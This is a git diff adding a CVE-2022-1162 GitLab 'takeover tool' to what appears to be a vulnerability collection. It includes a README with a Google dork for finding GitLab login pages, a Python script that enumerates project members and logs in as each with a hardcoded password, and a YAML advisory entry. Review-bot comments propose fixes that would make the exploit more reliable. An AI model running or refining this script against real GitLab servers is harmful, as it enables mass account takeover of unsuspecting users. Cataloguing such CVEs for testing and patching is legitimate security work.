diff --git a/cve/gitlab/2022/CVE-2022-1162/README.md b/cve/gitlab/2022/CVE-2022-1162/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..55c8d3484a4420e70b1c33c57e655f35a902f6b0
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-1162/README.md
@@ -0,0 +1,21 @@
+# CVE-2022-1162
+
+A GitLab TakeOver Tool
+
+A simple tool to enumerate users in gitlab and login using CVE-2022-1162
+
+
+
+### Google Dork
+intitle:"Sign in · GitLab"
+
+
+_____________
+
+### Cmd
+python code.py https://url.com
+
+_____________
+
+
+Pull Requests are Welcome!
diff --git a/cve/gitlab/2022/CVE-2022-1162/code.py b/cve/gitlab/2022/CVE-2022-1162/code.py
new file mode 100644
index 0000000000000000000000000000000000000000..c2a6ffee025fc59778cffcfdbca3c3ed456c7445
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-1162/code.py
@@ -0,0 +1,103 @@ + +''' + /$$ /$$ +|__/ | $$ + /$$ /$$$$$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$ +| $$ /$$__ $$ /$$_____/| $$__ $$ /$$__ $$| $$ | $$| $$__ $$ /$$__ $$ +| $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ \__/| $$ | $$| $$ \ $$| $$ \ $$ +| $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$ | $$ +| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$$$/| $$ | $$| $$$$$$/ +|__/| $$____/ |_______/ |_______/ |__/ \______/ |__/ |__/ \______/ + | $$ + | $$ + |__/ + +CVE-2022-1162 TAKEOVER TOOL +''' + +from bs4 import BeautifulSoup, SoupStrainer +import httplib2 +import urllib +import re +import sys +import json + + +takeoverpassword = '123qweQWE!@#000000000' +http = httplib2.Http() + +def get_xrsf(url): + endpoint = url + '/' + keyword = 'authenticity_token' + status, response = http.request(endpoint) + + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('input')): + if link.get('name') and keyword in link.get('name'): + return {'code': str(link.get('value')), 'cookies': str(status['set-cookie'])} + return False + +def req(url): + print('Exploring...') + endpoint = url + '/explore' + keyword = 'text-plain' + status, response = http.request(endpoint) + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')): + if link.get('class') and keyword in link.get('class'): + members(url, link.get('href')) + +def members(url, endpoint): + print("Finding members in project: ", endpoint) + endpoint = url +endpoint + '/-/project_members' + + status, response = http.request(endpoint) + for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', {'class': "js-project-members-list-app"})): + users = json.loads(link.get('data-members-data'))["user"]["members"] + + for user in users: + user = user["user"]["username"] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + + for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', 
{'class': "js-project-members-list"})): + users = json.loads(link.get('data-members-data'))["members"] + for user in users: + user = user["user"]["username"] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')): + if link.get('class') and 'js-user-link' in link.get('class'): + user = re.findall("\d+", link.get('href'))[0] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + +def login(url, username, password): + url_login = url + '/users/sign_in' + respxrsf = get_xrsf(url) + code = respxrsf["code"] + cookies = respxrsf["cookies"] + data = { + 'utf8':'✓', + 'authenticity_token':code, + 'user[login]':username, + 'user[password]':password, + 'user[remember_me]': 0 + + } + headers = {'Cookie': cookies, 'Content-type': 'application/x-www-form-urlencoded'} + + req = http.request(url_login, + method="POST", + headers=headers, + body=urllib.parse.urlencode(data))[1] + if 'invalid login or password' not in req.decode().lower(): + print(req.decode()) + print(url, username, password, 'pwned!!') + else: + print(url, username, 'wrong') + + +if __name__ == '__main__': + url = sys.argv[1] + print("Url selected: ", sys.argv[1]) + req(url) \ No newline at end of file diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7d7575e2c31bb5d68106ca8acc26709ec971e314 --- /dev/null +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml 
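Review bot: `login()` dereferences `respxrsf["code"]` even though `get_xrsf()` returns `False` when no `authenticity_token` input is found on the page, so a sign-in page without that field (or a non-HTML response) raises `TypeError` and aborts the whole run; guard it with `if not respxrsf: print(url, 'no authenticity_token found'); return`. `get_xrsf()` likewise indexes `status['set-cookie']` unconditionally, which raises `KeyError` when the response carries no Set-Cookie header — `status.get('set-cookie', '')` keeps the same return shape. In `members()`, the pattern `"\d+"` is a non-raw string with an invalid escape sequence; write it as `r"\d+"`. Inside `login()` the local `req` shadows the module-level `req()` function, and the `__main__` block reads `sys.argv[1]` without checking that an argument was supplied, so running the script with no URL fails with `IndexError` instead of a usage message.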
@@ -0,0 +1,22 @@ +id: CVE-2022-1162 +source: https://github.com/ipsBruno/CVE-2022-1162 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + GitLab中通过OmniAuth供应商(如OAuth,LDAP,SAML)注册的账号设置了硬编码的口令,这可能导致攻击者直接接管账号。 + scope-of-influence: + 14.7 <= GitLab(CE/EE)< 14.7.7 + 14.8 <= GitLab(CE/EE)< 14.8.5 + 14.9 <= GitLab(CE/EE)< 14.9.2 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-1162 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1162 + cwe-id: CWE-798 + cnvd-id: None + kve-id: None + tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7beb22c218ff26e79627829ece37c6ab0..589cd6d0dbd58611f30d5c30429217857d1d31f5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -21,6 +21,7 @@ cve: - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2022-1162 confluence: - CVE-2019-3396 - CVE-2021-26084
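Review bot: `scope-of-influence:` is followed by the three version ranges as an indented plain scalar rather than a block scalar, so a YAML parser folds them into one string (`14.7 <= GitLab(CE/EE)< 14.7.7 14.8 <= ... 14.9.2`); if the line breaks are meant to survive, write `scope-of-influence: |` as `description` already does (indentation is not visible in this collapsed hunk, so this is inferred from the missing indicator). `cnvd-id: None` and `kve-id: None` are the literal string `None`, not a YAML null — use `~` or `null`, or omit the keys, unless the rest of the corpus relies on that string by convention. The `name` field holds a one-sentence product description rather than a vulnerability title; consider moving that text into `description` and giving `name` a short title.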